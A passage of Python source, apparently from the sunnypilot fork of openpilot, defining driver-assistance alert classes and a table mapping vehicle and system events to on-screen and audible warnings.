    return any(event_type in EVENTS.get(name, {}) for name in self.events)

  def create_alerts(self, event_types, callback_args=None):
    """Build the Alert objects for current events matching any of event_types.

    Callable table entries are invoked with callback_args; an alert is only
    emitted once the event has been active longer than its creation_delay.
    """
    if callback_args is None:
      callback_args = []

    alerts = []
    for name in self.events:
      event = EVENTS[name]
      for et in event_types:
        if et not in event:
          continue
        alert = event[et]
        if not isinstance(alert, Alert):
          alert = alert(*callback_args)

        if DT_CTRL * (self.events_prev[name] + 1) >= alert.creation_delay:
          alert.alert_type = f"{EVENT_NAME[name]}/{et}"
          alert.event_type = et
          alerts.append(alert)
    return alerts

  def add_from_msg(self, events):
    """Append the raw enum names from a list of CarEvent capnp readers."""
    self.events.extend(e.name.raw for e in events)

  def to_msg(self):
    """Serialize the current events as CarEvent messages with their type flags set."""
    msgs = []
    for name in self.events:
      msg = car.CarEvent.new_message()
      msg.name = name
      for et in EVENTS.get(name, {}):
        setattr(msg, et, True)
      msgs.append(msg)
    return msgs
class Alert:
  """A single on-screen/audible alert and its display metadata.

  Instances live in the EVENTS table; Events.create_alerts fills in
  alert_type/event_type before they are handed to the UI.
  """

  def __init__(self,
               alert_text_1: str,
               alert_text_2: str,
               alert_status: log.ControlsState.AlertStatus,
               alert_size: log.ControlsState.AlertSize,
               priority: Priority,
               visual_alert: car.CarControl.HUDControl.VisualAlert,
               audible_alert: car.CarControl.HUDControl.AudibleAlert,
               duration: float,
               alert_rate: float = 0.,
               creation_delay: float = 0.):
    self.alert_text_1 = alert_text_1
    self.alert_text_2 = alert_text_2
    self.alert_status = alert_status
    self.alert_size = alert_size
    self.priority = priority
    self.visual_alert = visual_alert
    self.audible_alert = audible_alert

    # duration is given in seconds; stored as an integer count of DT_CTRL steps
    self.duration = int(duration / DT_CTRL)

    self.alert_rate = alert_rate
    # seconds the event must stay active before the alert is shown
    # (checked against DT_CTRL * frame count in Events.create_alerts)
    self.creation_delay = creation_delay

    # filled in by Events.create_alerts
    self.alert_type = ""
    self.event_type = None

  def __str__(self) -> str:
    return f"{self.alert_text_1}/{self.alert_text_2} {self.priority} {self.visual_alert} {self.audible_alert}"

  def __gt__(self, alert2) -> bool:
    # higher-priority alerts win when competing for the screen
    return self.priority > alert2.priority
class NoEntryAlert(Alert):
  """Alert shown when engagement is refused; fixed 'openpilot Unavailable' title."""

  def __init__(self, alert_text_2, visual_alert=VisualAlert.none):
    super().__init__(alert_text_1="openpilot Unavailable",
                     alert_text_2=alert_text_2,
                     alert_status=AlertStatus.normal,
                     alert_size=AlertSize.mid,
                     priority=Priority.LOW,
                     visual_alert=visual_alert,
                     audible_alert=AudibleAlert.refuse,
                     duration=3.)
class SoftDisableAlert(Alert):
  """Full-screen 'take control' alert shown while openpilot soft-disables."""

  def __init__(self, alert_text_2):
    # NOTE: removed a stray trailing comma after this call; it turned the
    # statement into a pointless throwaway 1-tuple
    super().__init__("TAKE CONTROL IMMEDIATELY", alert_text_2,
                     AlertStatus.userPrompt, AlertSize.full,
                     Priority.MID, VisualAlert.steerRequired,
                     AudibleAlert.warningSoft, 2.)
# less harsh version of SoftDisable, where the condition is user-triggered
class UserSoftDisableAlert(SoftDisableAlert):
  """SoftDisableAlert variant with a milder title for user-caused conditions."""

  def __init__(self, alert_text_2):
    # NOTE: removed stray trailing commas; each turned its statement into a
    # pointless throwaway 1-tuple
    super().__init__(alert_text_2)
    self.alert_text_1 = "openpilot will disengage"
class ImmediateDisableAlert(Alert):
  """Full-screen critical alert used when control must be handed back immediately."""

  def __init__(self, alert_text_2):
    # NOTE: removed a stray trailing comma after this call; it turned the
    # statement into a pointless throwaway 1-tuple
    super().__init__("TAKE CONTROL IMMEDIATELY", alert_text_2,
                     AlertStatus.critical, AlertSize.full,
                     Priority.HIGHEST, VisualAlert.steerRequired,
                     AudibleAlert.warningImmediate, 4.)
class EngagementAlert(Alert):
  """Visually empty alert that only plays an engage/disengage chime."""

  def __init__(self, audible_alert: car.CarControl.HUDControl.AudibleAlert):
    # NOTE: removed a stray trailing comma after this call; it turned the
    # statement into a pointless throwaway 1-tuple
    super().__init__("", "",
                     AlertStatus.normal, AlertSize.none,
                     Priority.MID, VisualAlert.none,
                     audible_alert, .2)
class NormalPermanentAlert(Alert):
  """Permanent, low-priority status alert; two-line layout when a second line is given."""

  def __init__(self, alert_text_1: str, alert_text_2: str = "", duration: float = 0.2, priority: Priority = Priority.LOWER, creation_delay: float = 0.):
    # NOTE: removed a stray trailing comma after this call (pointless 1-tuple);
    # also use string truthiness instead of len() for the size choice
    super().__init__(alert_text_1, alert_text_2,
                     AlertStatus.normal, AlertSize.mid if alert_text_2 else AlertSize.small,
                     priority, VisualAlert.none, AudibleAlert.none, duration, creation_delay=creation_delay)
class StartupAlert(Alert):
  """Alert shown at startup; defaults to the MADS usage hint as the second line."""

  def __init__(self, alert_text_1: str, alert_text_2: str = "To use MADS, press the LFA or ACC MAIN button", alert_status=AlertStatus.normal):
    # NOTE: removed a stray trailing comma after this call; it turned the
    # statement into a pointless throwaway 1-tuple
    super().__init__(alert_text_1, alert_text_2,
                     alert_status, AlertSize.mid,
                     Priority.LOWER, VisualAlert.none, AudibleAlert.none, 10.)
# ********** helper functions **********
def get_display_speed(speed_ms: float, metric: bool) -> str:
  """Format a speed in m/s as a rounded integer plus unit for the chosen system."""
  if metric:
    factor, unit = CV.MS_TO_KPH, 'km/h'
  else:
    factor, unit = CV.MS_TO_MPH, 'mph'
  return f"{int(round(speed_ms * factor))} {unit}"
# ********** alert callback functions **********
# Signature shared by the alert-callback functions below:
# (CP, sm, metric, soft_disable_time) -> Alert
AlertCallbackType = Callable[[car.CarParams, messaging.SubMaster, bool, int], Alert]
def soft_disable_alert(alert_text_2: str) -> AlertCallbackType:
  """Return a callback producing a SoftDisableAlert, escalating near the deadline."""
  def _alert(CP: car.CarParams, sm: messaging.SubMaster, metric: bool, soft_disable_time: int) -> Alert:
    # escalate to an immediate disable when less than half a second remains
    if soft_disable_time < int(0.5 / DT_CTRL):
      return ImmediateDisableAlert(alert_text_2)
    return SoftDisableAlert(alert_text_2)
  return _alert
def user_soft_disable_alert(alert_text_2: str) -> AlertCallbackType:
  """Return a callback producing a UserSoftDisableAlert, escalating near the deadline."""
  def _alert(CP: car.CarParams, sm: messaging.SubMaster, metric: bool, soft_disable_time: int) -> Alert:
    # escalate to an immediate disable when less than half a second remains
    if soft_disable_time < int(0.5 / DT_CTRL):
      return ImmediateDisableAlert(alert_text_2)
    return UserSoftDisableAlert(alert_text_2)
  return _alert
def below_engage_speed_alert(CP: car.CarParams, sm: messaging.SubMaster, metric: bool, soft_disable_time: int) -> Alert:
  """No-entry alert telling the driver the car is under the minimum engage speed."""
  speed_str = get_display_speed(CP.minEnableSpeed, metric)
  return NoEntryAlert(f"Speed Below {speed_str}")
def below_steer_speed_alert(CP: car.CarParams, sm: messaging.SubMaster, metric: bool, soft_disable_time: int) -> Alert:
  """Small prompt shown while the car is below its minimum steering speed."""
  title = f"Steer Unavailable Below {get_display_speed(CP.minSteerSpeed, metric)}"
  return Alert(title, "",
               AlertStatus.userPrompt, AlertSize.small,
               Priority.MID, VisualAlert.steerRequired, AudibleAlert.prompt, 0.4)
def calibration_incomplete_alert(CP: car.CarParams, sm: messaging.SubMaster, metric: bool, soft_disable_time: int) -> Alert:
  """Alert showing calibration progress and the speed needed to continue it.

  Switched the lone %-style format in this file to an f-string; int()
  reproduces %d's truncation of the percentage value.
  """
  return Alert(
    f"Calibration in Progress: {int(sm['liveCalibration'].calPerc)}%",
    f"Drive Above {get_display_speed(MIN_SPEED_FILTER, metric)}",
    AlertStatus.normal, AlertSize.mid,
    Priority.LOWEST, VisualAlert.none, AudibleAlert.none, .2)
def no_gps_alert(CP: car.CarParams, sm: messaging.SubMaster, metric: bool, soft_disable_time: int) -> Alert:
  """Alert for poor GPS reception; the hint depends on whether GPS is panda-integrated."""
  integrated_pandas = (log.PandaState.PandaType.uno, log.PandaState.PandaType.dos)
  if sm['peripheralState'].pandaType in integrated_pandas:
    hint = "If sky is visible, contact support"
  else:
    hint = "Check GPS antenna placement"
  return Alert(
    "Poor GPS reception",
    hint,
    AlertStatus.normal, AlertSize.mid,
    Priority.LOWER, VisualAlert.none, AudibleAlert.none, .2, creation_delay=300.)
def wrong_car_mode_alert(CP: car.CarParams, sm: messaging.SubMaster, metric: bool, soft_disable_time: int) -> Alert:
  """No-entry alert for the wrong cruise/main mode, with Honda-specific wording."""
  text = "Main Switch Off" if CP.carName == "honda" else "Cruise Mode Disabled"
  return NoEntryAlert(text)
def joystick_alert(CP: car.CarParams, sm: messaging.SubMaster, metric: bool, soft_disable_time: int) -> Alert:
  """Permanent alert showing the current joystick gas/steer percentages."""
  axes = sm['testJoystick'].axes
  # default to neutral unless both axes are present; the previous
  # `gb, steer = list(axes)[:2]` raised ValueError on a single-axis message
  gb, steer = (axes[0], axes[1]) if len(axes) >= 2 else (0., 0.)
  vals = f"Gas: {round(gb * 100.)}%, Steer: {round(steer * 100.)}%"
  return NormalPermanentAlert("Joystick Mode", vals)
def speed_limit_adjust_alert(CP: car.CarParams, sm: messaging.SubMaster, metric: bool, soft_disable_time: int) -> Alert:
  """Small alert announcing the speed limit being adapted to, in display units."""
  limit_ms = sm['longitudinalPlan'].speedLimit
  unit = "km/h" if metric else "mph"
  speed = round(limit_ms * (CV.MS_TO_KPH if metric else CV.MS_TO_MPH))
  return Alert(
    f'Adjusting to {speed} {unit} speed limit',
    "",
    AlertStatus.normal, AlertSize.small,
    Priority.LOW, VisualAlert.none, AudibleAlert.none, 4.)
EVENTS: Dict[int, Dict[str, Union[Alert, AlertCallbackType]]] = {
# ********** events with no alerts **********
EventName.stockFcw: {},
# ********** events only containing alerts displayed in all states **********
EventName.joystickDebug: {
ET.WARNING: joystick_alert,
ET.PERMANENT: NormalPermanentAlert("Joystick Mode"),
},
EventName.controlsInitializing: {
ET.NO_ENTRY: NoEntryAlert("System Initializing"),
},
EventName.startup: {
ET.PERMANENT: StartupAlert("sunnypilot Initialized")
},
EventName.startupMaster: {
ET.PERMANENT: StartupAlert("WARNING: This branch is not tested",
alert_status=AlertStatus.userPrompt),
},
# Car is recognized, but marked as dashcam only
EventName.startupNoControl: {
ET.PERMANENT: StartupAlert("Dashcam mode"),
},
# Car is not recognized
EventName.startupNoCar: {
ET.PERMANENT: StartupAlert("Dashcam mode for unsupported car"),
},
EventName.startupNoFw: {
ET.PERMANENT: StartupAlert("Car Unrecognized",
"Check comma power connections",
alert_status=AlertStatus.userPrompt),
},
EventName.dashcamMode: {
ET.PERMANENT: NormalPermanentAlert("Dashcam Mode",
priority=Priority.LOWEST),
},
EventName.invalidLkasSetting: {
ET.PERMANENT: NormalPermanentAlert("Stock LKAS is on",
"Turn off stock LKAS to engage"),
},
EventName.cruiseMismatch: {
#ET.PERMANENT: ImmediateDisableAlert("openpilot failed to cancel cruise"),
},
# Some features or cars are marked as community features. If openpilot
# detects the use of a community feature it switches to dashcam mode
# until these features are allowed using a toggle in settings.
EventName.communityFeatureDisallowed: {
ET.PERMANENT: NormalPermanentAlert("openpilot Unavailable",
"Enable Community Features in Settings"),
},
# openpilot doesn't recognize the car. This switches openpilot into a
# read-only mode. This can be solved by adding your fingerprint.
# See https://github.com/commaai/openpilot/wiki/Fingerprinting for more information
EventName.carUnrecognized: {
ET.PERMANENT: NormalPermanentAlert("Dashcam Mode",
"Car Unrecognized",
priority=Priority.LOWEST),
},
EventName.stockAeb: {
ET.PERMANENT: Alert(
"BRAKE!",
"Stock AEB: Risk of Collision",
AlertStatus.critical, AlertSize.full,
Priority.HIGHEST, VisualAlert.fcw, AudibleAlert.none, 2.),
ET.NO_ENTRY: NoEntryAlert("Stock AEB: Risk of Collision"),
},
EventName.fcw: {
ET.PERMANENT: Alert(
"BRAKE!",
"Risk of Collision",
AlertStatus.critical, AlertSize.full,
Priority.HIGHEST, VisualAlert.fcw, AudibleAlert.warningSoft, 2.),
},
EventName.ldw: {
ET.PERMANENT: Alert(
"Lane Departure Detected",
"",
AlertStatus.userPrompt, AlertSize.small,
Priority.LOW, VisualAlert.ldw, AudibleAlert.prompt, 3.),
},
# ********** events only containing alerts that display while engaged **********
EventName.gasPressed: {
ET.PRE_ENABLE: Alert(
"Release Gas Pedal to Engage",
"",
AlertStatus.normal, AlertSize.small,
Priority.LOWEST, VisualAlert.none, AudibleAlert.none, .1, creation_delay=1.),
},
# openpilot tries to learn certain parameters about your car by observing
# how the car behaves to steering inputs from both human and openpilot driving.
# This includes:
# - steer ratio: gear ratio of the steering rack. Steering angle divided by tire angle
# - tire stiffness: how much grip your tires have
# - angle offset: most steering angle sensors are offset and measure a non zero angle when driving straight
# This alert is thrown when any of these values exceed a sanity check. This can be caused by
# bad alignment or bad sensor data. If this happens consistently consider creating an issue on GitHub
EventName.vehicleModelInvalid: {
ET.NO_ENTRY: NoEntryAlert("Vehicle Parameter Identification Failed"),
ET.SOFT_DISABLE: soft_disable_alert("Vehicle Parameter Identification Failed"),
},
EventName.steerTempUnavailableSilent: {
ET.WARNING: Alert(
"Steering Temporarily Unavailable",
"",
AlertStatus.userPrompt, AlertSize.small,
Priority.LOW, VisualAlert.steerRequired, AudibleAlert.prompt, 1.),
},
EventName.preDriverDistracted: {
ET.WARNING: Alert(
"Pay Attention",
"",
AlertStatus.normal, AlertSize.small,
Priority.LOW, VisualAlert.none, AudibleAlert.none, .1),
},
EventName.promptDriverDistracted: {
ET.WARNING: Alert(
"Pay Attention",
"Driver Distracted",
AlertStatus.userPrompt, AlertSize.mid,
Priority.MID, VisualAlert.steerRequired, AudibleAlert.promptDistracted, .1),
},
EventName.driverDistracted: {
ET.WARNING: Alert(
"DISENGAGE IMMEDIATELY",
"Driver Distracted",
AlertStatus.critical, AlertSize.full,
Priority.HIGH, VisualAlert.steerRequired, AudibleAlert.warningImmediate, .1),
},
EventName.preDriverUnresponsive: {
ET.WARNING: Alert(
"Touch Steering Wheel: No Face Detected",
"",
AlertStatus.normal, AlertSize.small,
Priority.LOW, VisualAlert.steerRequired, AudibleAlert.none, .1, alert_rate=0.75),
},
EventName.promptDriverUnresponsive: {
ET.WARNING: Alert(
"Touch Steering Wheel",
"Driver Unresponsive",
AlertStatus.userPrompt, AlertSize.mid,
Priority.MID, VisualAlert.steerRequired, AudibleAlert.promptDistracted, .1),
},
EventName.driverUnresponsive: {
ET.WARNING: Alert(
"DISENGAGE IMMEDIATELY",
"Driver Unresponsive",
AlertStatus.critical, AlertSize.full,
Priority.HIGH, VisualAlert.steerRequired, AudibleAlert.warningImmediate, .1),
},
EventName.preKeepHandsOnWheel: {
ET.WARNING: Alert(
"No hands on steering wheel detected",
"",
AlertStatus.userPrompt, AlertSize.small,
Priority.MID, VisualAlert.steerRequired, AudibleAlert.none, .1, alert_rate=0.75),
},
EventName.promptKeepHandsOnWheel: {
ET.WARNING: Alert(
"HANDS OFF STEERING WHEEL",
"Place hands on steering wheel",
AlertStatus.critical, AlertSize.mid,
Priority.MID, VisualAlert.steerRequired, AudibleAlert.promptDistracted, .1),
},
EventName.keepHandsOnWheel: {
ET.IMMEDIATE_DISABLE: ImmediateDisableAlert("Driver kept hands off sterring wheel"),
},
EventName.manualRestart: {
ET.WARNING: Alert(
"TAKE CONTROL",
"Resume Driving Manually",
AlertStatus.userPrompt, AlertSize.mid,
Priority.LOW, VisualAlert.none, AudibleAlert.none, .2),
},
EventName.resumeRequired: {
ET.WARNING: Alert(
"STOPPED",
"Press Resume to Go",
AlertStatus.userPrompt, AlertSize.mid,
Priority.LOW, VisualAlert.none, AudibleAlert.none, .2),
},
EventName.belowSteerSpeed: {
ET.WARNING: below_steer_speed_alert,
},
EventName.preLaneChangeLeft: {
ET.WARNING: Alert(
"Steer Left to Start Lane Change Once Safe",
"",
AlertStatus.normal, AlertSize.small,
Priority.LOW, VisualAlert.none, AudibleAlert.none, .1, alert_rate=0.75),
},
EventName.preLaneChangeRight: {
ET.WARNING: Alert(
"Steer Right to Start Lane Change Once Safe",
"",
AlertStatus.normal, AlertSize.small,
Priority.LOW, VisualAlert.none, AudibleAlert.none, .1, alert_rate=0.75),
},
EventName.laneChangeBlocked: {
ET.WARNING: Alert(
"Car Detected in Blindspot",
"",
AlertStatus.userPrompt, AlertSize.small,
Priority.LOW, VisualAlert.none, AudibleAlert.prompt, .1),
},
EventName.laneChange: {
ET.WARNING: Alert(
"Changing Lanes",
"",
AlertStatus.normal, AlertSize.small,
Priority.LOW, VisualAlert.none, AudibleAlert.none, .1),
},
EventName.manualSteeringRequired: {
ET.WARNING: Alert(
"MADS is OFF",
"Manual Steering Required",
AlertStatus.normal, AlertSize.mid,
Priority.LOW, VisualAlert.none, AudibleAlert.disengage, 2.),
},
EventName.manualLongitudinalRequired: {
ET.WARNING: Alert(
"Smart/Adaptive Cruise Control is OFF",
"Manual Gas/Brakes Required",
AlertStatus.normal, AlertSize.mid,
Priority.LOW, VisualAlert.none, AudibleAlert.none, 2.),
},
EventName.steerSaturated: {
ET.WARNING: Alert(
"Take Control",
"Turn Exceeds Steering Limit",
AlertStatus.userPrompt, AlertSize.mid,
Priority.LOW, VisualAlert.steerRequired, AudibleAlert.promptRepeat, 1.),
},
# Thrown when the fan is driven at >50% but is not rotating
EventName.fanMalfunction: {
ET.PERMANENT: NormalPermanentAlert("Fan Malfunction", "Contact Support"),
},
# Camera is not outputting frames at a constant framerate
EventName.cameraMalfunction: {
ET.PERMANENT: NormalPermanentAlert("Camera Malfunction", "Contact Support"),
},
# Unused
EventName.gpsMalfunction: {
ET.PERMANENT: NormalPermanentAlert("GPS Malfunction", "Contact Support"),
},
# When the GPS position and localizer diverge the localizer is reset to the
# current GPS position. This alert is thrown when the localizer is reset
# more often than expected.
EventName.localizerMalfunction: {
ET.PERMANENT: NormalPermanentAlert("Sensor Malfunction", "Contact Support"),
},
EventName.speedLimitActive: {
ET.WARNING: Alert(
"Cruise set to speed limit",
"",
AlertStatus.normal, AlertSize.small,
Priority.LOW, VisualAlert.none, AudibleAlert.none, 2.),
},
EventName.speedLimitValueChange: {
ET.WARNING: speed_limit_adjust_alert,
},
# ********** events that affect controls state transitions **********
EventName.pcmEnable: {
ET.ENABLE: EngagementAlert(AudibleAlert.engage),
},
EventName.buttonEnable: {
ET.ENABLE: EngagementAlert(AudibleAlert.engage),
},
EventName.silentButtonEnable: {
ET.ENABLE: Alert(
"",
"",
AlertStatus.normal, AlertSize.none,
Priority.MID, VisualAlert.none, AudibleAlert.none, .2),
},
EventName.pcmDisable: {
ET.USER_DISABLE: EngagementAlert(AudibleAlert.disengage),
},
EventName.buttonCancel: {
ET.USER_DISABLE: EngagementAlert(AudibleAlert.disengage),
},
EventName.brakeHold: {
ET.USER_DISABLE: EngagementAlert(AudibleAlert.disengage),
ET.NO_ENTRY: NoEntryAlert("Brake Hold Active"),
},
EventName.silentBrakeHold: {
ET.USER_DISABLE: Alert(
"",
"",
AlertStatus.normal, AlertSize.none,
Priority.MID, VisualAlert.none, AudibleAlert.none, .2),
ET.NO_ENTRY: NoEntryAlert("Brake Hold Active"),
},
EventName.parkBrake: {
ET.USER_DISABLE: EngagementAlert(AudibleAlert.disengage),
ET.NO_ENTRY: NoEntryAlert("Parking Brake Engaged"),
},
EventName.pedalPressed: {
ET.USER_DISABLE: EngagementAlert(AudibleAlert.disengage),
ET.NO_ENTRY: NoEntryAlert("Pedal Pressed",
visual_alert=VisualAlert.brakePressed),
},
EventName.silentPedalPressed: {
ET.USER_DISABLE: Alert(
"",
"",
AlertStatus.normal, AlertSize.none,
Priority.MID, VisualAlert.none, AudibleAlert.none, .2),
ET.NO_ENTRY: NoEntryAlert("Pedal Pressed During Attempt",
visual_alert=VisualAlert.brakePressed),
},
EventName.wrongCarMode: {
ET.USER_DISABLE: EngagementAlert(AudibleAlert.disengage),
ET.NO_ENTRY: wrong_car_mode_alert,
},
EventName.wrongCruiseMode: {
ET.USER_DISABLE: EngagementAlert(AudibleAlert.disengage),
ET.NO_ENTRY: NoEntryAlert("Adaptive Cruise Disabled"),
},
EventName.steerTempUnavailable: {
ET.SOFT_DISABLE: soft_disable_alert("Steering Temporarily Unavailable"),
ET.NO_ENTRY: NoEntryAlert("Steering Temporarily Unavailable"),
},
EventName.outOfSpace: {
ET.PERMANENT: NormalPermanentAlert("Out of Storage"),
ET.NO_ENTRY: NoEntryAlert("Out of Storage"),
},
EventName.belowEngageSpeed: {
ET.NO_ENTRY: below_engage_speed_alert,
},
EventName.sensorDataInvalid: {
ET.PERMANENT: Alert(
"No Data from Device Sensors",
"Reboot your Device",
AlertStatus.normal, AlertSize.mid,
Priority.LOWER, VisualAlert.none, AudibleAlert.none, .2, creation_delay=1.),
ET.NO_ENTRY: NoEntryAlert("No Data from Device Sensors"),
},
EventName.noGps: {
ET.PERMANENT: no_gps_alert,
},
EventName.soundsUnavailable: {
ET.PERMANENT: NormalPermanentAlert("Speaker not found", "Reboot your Device"),
ET.NO_ENTRY: NoEntryAlert("Speaker not found"),
},
EventName.tooDistracted: {
ET.NO_ENTRY: NoEntryAlert("Distraction Level Too High"),
},
EventName.overheat: {
ET.PERMANENT: NormalPermanentAlert("System Overheated"),
ET.SOFT_DISABLE: soft_disable_alert("System Overheated"),
ET.NO_ENTRY: NoEntryAlert("System Overheated"),
},
EventName.wrongGear: {
ET.SOFT_DISABLE: user_soft_disable_alert("Gear not D"),
ET.NO_ENTRY: NoEntryAlert("Gear not D"),
},
EventName.silentWrongGear: {
ET.SOFT_DISABLE: Alert(
"Gear not D",
"openpilot Unavailable",
AlertStatus.normal, AlertSize.mid,
Priority.LOW, VisualAlert.none, AudibleAlert.none, 0., 2., 3.),
ET.NO_ENTRY: Alert(
"Gear not D",
"openpilot Unavailable",
AlertStatus.normal, AlertSize.mid,
Priority.LOW, VisualAlert.none, AudibleAlert.none, 0., 2., 3.),
},
# This alert is thrown when the calibration angles are outside of the acceptable range.
# For example if the device is pointed too much to the left or the right.
# Usually this can only be solved by removing the mount from the windshield completely,
# and attaching while making sure the device is pointed straight forward and is level.
# See https://comma.ai/setup for more information
EventName.calibrationInvalid: {
ET.PERMANENT: NormalPermanentAlert("Calibration Invalid", "Remount Device and Recalibrate"),
ET.SOFT_DISABLE: soft_disable_alert("Calibration Invalid: Remount Device & Recalibrate"),
ET.NO_ENTRY: NoEntryAlert("Calibration Invalid: Remount Device & Recalibrate"),
},
EventName.calibrationIncomplete: {
ET.PERMANENT: calibration_incomplete_alert,
ET.SOFT_DISABLE: soft_disable_alert("Calibration in Progress"),
ET.NO_ENTRY: NoEntryAlert("Calibration in Progress"),
},
EventName.doorOpen: {
ET.SOFT_DISABLE: user_soft_disable_alert("Door Open"),
ET.NO_ENTRY: NoEntryAlert("Door Open"),
},
EventName.seatbeltNotLatched: {
ET.SOFT_DISABLE: user_soft_disable_alert("Seatbelt Unlatched"),
ET.NO_ENTRY: NoEntryAlert("Seatbelt Unlatched"),
},
EventName.espDisabled: {
ET.SOFT_DISABLE: soft_disable_alert("ESP Off"),
ET.NO_ENTRY: NoEntryAlert("ESP Off"),
},
EventName.lowBattery: {
ET.SOFT_DISABLE: soft_disable_alert("Low Battery"),
ET.NO_ENTRY: NoEntryAlert("Low Battery"),
},
# Different openpilot services communicate between each other at a certain
# interval. If communication does not follow the regular schedule this alert
# is thrown. This can mean a service crashed, did not broadcast a message for
# ten times the regular interval, or the average interval is more than 10% too high.
EventName.commIssue: {
ET.SOFT_DISABLE: soft_disable_alert("Communication Issue between Processes"),
ET.NO_ENTRY: NoEntryAlert("Communication Issue between Processes"),
},
# Thrown when manager detects a service exited unexpectedly while driving
EventName.processNotRunning: {
ET.NO_ENTRY: NoEntryAlert("System Malfunction: Reboot Your Device"),
},
EventName.radarFault: {
ET.SOFT_DISABLE: soft_disable_alert("Radar Error: Restart the Car"),
ET.NO_ENTRY: NoEntryAlert("Radar Error: Restart the Car"),
},
# Every frame from the camera should be processed by the model. If modeld
# is not processing frames fast enough they have to be dropped. This alert is
# thrown when over 20% of frames are dropped.
EventName.modeldLagging: {
ET.SOFT_DISABLE: soft_disable_alert("Driving model lagging"),
ET.NO_ENTRY: NoEntryAlert("Driving model lagging"),
},
# Besides predicting the path, lane lines and lead car data the model also
# predicts the current velocity and rotation speed of the car. If the model is
# very uncertain about the current velocity while the car is moving, this
# usually means the model has trouble understanding the scene. This is used
# as a heuristic to warn the driver.
EventName.posenetInvalid: {
ET.SOFT_DISABLE: soft_disable_alert("Model Output Uncertain"),
ET.NO_ENTRY: NoEntryAlert("Model Output Uncertain"),
},
# When the localizer detects an acceleration of more than 40 m/s^2 (~4G) we
# alert the driver the device might have fallen from the windshield.
EventName.deviceFalling: {
ET.SOFT_DISABLE: soft_disable_alert("Device Fell Off Mount"),
ET.NO_ENTRY: NoEntryAlert("Device Fell Off Mount"),
},
EventName.lowMemory: {
ET.SOFT_DISABLE: soft_disable_alert("Low Memory: Reboot Your Device"),
ET.PERMANENT: NormalPermanentAlert("Low Memory", "Reboot your Device"),
ET.NO_ENTRY: NoEntryAlert("Low Memory: Reboot Your Device"),
},
EventName.highCpuUsage: {
#ET.SOFT_DISABLE: soft_disable_alert("System Malfunction: Reboot Your Device"),
#ET.PERMANENT: NormalPermanentAlert("System Malfunction", "Reboot your Device"),
ET.NO_ENTRY: NoEntryAlert("System Malfunction: Reboot Your Device"),
},
EventName.accFaulted: {
ET.IMMEDIATE_DISABLE: ImmediateDisableAlert("Cruise Faulted"),
ET.PERMANENT: NormalPermanentAlert("Cruise Faulted", ""),
ET.NO_ENTRY: NoEntryAlert("Cruise Faulted"),
},
EventName.controlsMismatch: {
ET.IMMEDIATE_DISABLE: ImmediateDisableAlert("Controls Mismatch"),
},
EventName.roadCameraError: {
ET.PERMANENT: NormalPermanentAlert("Camera Error",
duration=1.,
creation_delay=30.),
},
EventName.driverCameraError: {
ET.PERMANENT: NormalPermanentAlert("Camera Error",
duration=1.,
creation_delay=30.),
},
EventName.wideRoadCameraError: {
ET.PERMANENT: NormalPermanentAlert("Camera Error",
duration=1.,
creation_delay=30.),
},
# Sometimes the USB stack on the device can get into a bad state
# causing the connection to the panda to be lost
EventName.usbError: {
ET.SOFT_DISABLE: soft_disable_alert("USB Error: Reboot Your Device"),
ET.PERMANENT: NormalPermanentAlert("USB Error: Reboot Your Device", ""),
ET.NO_ENTRY: NoEntryAlert("USB Error: Reboot Your Device"),
},
# This alert can be thrown for the following reasons:
# - No CAN data received at all
# - CAN data is received, but some message are not received at the right frequency
# If you're not writing a new car port, this is usually cause by faulty wiring
EventName.canError: {
ET.IMMEDIATE_DISABLE: ImmediateDisableAlert("CAN Error: Check Connections"),
ET.PERMANENT: Alert(
"CAN Error: Check Connections",
"",
AlertStatus.normal, AlertSize.small,
Priority.LOW, VisualAlert.none, AudibleAlert.none, 1., creation_delay=1.),
ET.NO_ENTRY: NoEntryAlert("CAN Error: Check Connections"),
},
EventName.steerUnavailable: {
ET.IMMEDIATE_DISABLE: ImmediateDisableAlert("LKAS Fault: Restart the Car"),
ET.PERMANENT: NormalPermanentAlert("LKAS Fault: Restart the car to engage"),
ET.NO_ENTRY: NoEntryAlert("LKAS Fault: Restart the Car"),
},
EventName.brakeUnavailable: {
ET.IMMEDIATE_DISABLE: ImmediateDisableAlert("Cruise Fault: Restart the Car"),
ET.PERMANENT: NormalPermanentAlert("Cruise Fault: Restart the car to engage"),
ET.NO_ENTRY: NoEntryAlert("Cruise Fault: Restart the Car"),
},
EventName.reverseGear: {
ET.PERMANENT: Alert(
"Reverse\nGear",
"",
AlertStatus.normal, AlertSize.full,
Priority.LOWEST, VisualAlert.none, AudibleAlert.none, .2, creation_delay=0.5),
ET.USER_DISABLE: ImmediateDisableAlert("Reverse Gear"),
ET.NO_ENTRY: NoEntryAlert("Reverse Gear"),
},
# On cars that use stock ACC the car can decide to cancel ACC for various reasons.
# When this happens we can no long control the car so the user needs to be warned immediately.
EventName.cruiseDisabled: {
ET.IMMEDIATE_DISABLE: ImmediateDisableAlert("Cruise Is Off"),
},
# For planning the trajectory Model Predictive Control (MPC) is used. This is
# an optimization algorithm that is not guaranteed to find a feasible solution.
# If no solution is found or the solution has a very high cost this alert is thrown.
EventName.plannerError: {
ET.IMMEDIATE_DISABLE: ImmediateDisableAlert("Planner Solution Error"),
ET.NO_ENTRY: NoEntryAlert("Planner Solution Error"),
},
# When the relay in the harness box opens the CAN bus between the LKAS camera
# and the rest of the car is separated. When messages from the LKAS camera
# are received on the car side this usually means the relay hasn't opened correctly
# and this alert is thrown.
EventName.relayMalfunction: {
ET.IMMEDIATE_DISABLE: ImmediateDisableAlert("Harness Malfunction"),
ET.PERMANENT: NormalPermanentAlert("Harness Malfunction", "Check Hardware"),
ET.NO_ENTRY: NoEntryAlert("Harness Malfunction"),
},
EventName.noTarget: {
ET.IMMEDIATE_DISABLE: Alert(
"openpilot Canceled",
"No close lead car",
AlertStatus.normal, AlertSize.mid,
Priority.HIGH, VisualAlert.none, AudibleAlert.disengage, 3.),
ET.NO_ENTRY: NoEntryAlert("No Close Lead Car"),
},
EventName.speedTooLow: {
ET.IMMEDIATE_DISABLE: Alert(
"openpilot Canceled",
"Speed too low",
AlertStatus.normal, AlertSize.mid,
Priority.HIGH, VisualAlert.none, AudibleAlert.disengage, 3.),
},
# When the car is driving faster than most cars in the training data, the model outputs can be unpredictable.
EventName.speedTooHigh: {
ET.WARNING: Alert(
"Speed Too High",
"Model uncertain at this speed",
AlertStatus.userPrompt, AlertSize.mid,
Priority.HIGH, VisualAlert.steerRequired, AudibleAlert.promptRepeat, 4.),
ET.NO_ENTRY: NoEntryAlert("Slow down to engage"),
},
EventName.lowSpeedLockout: {
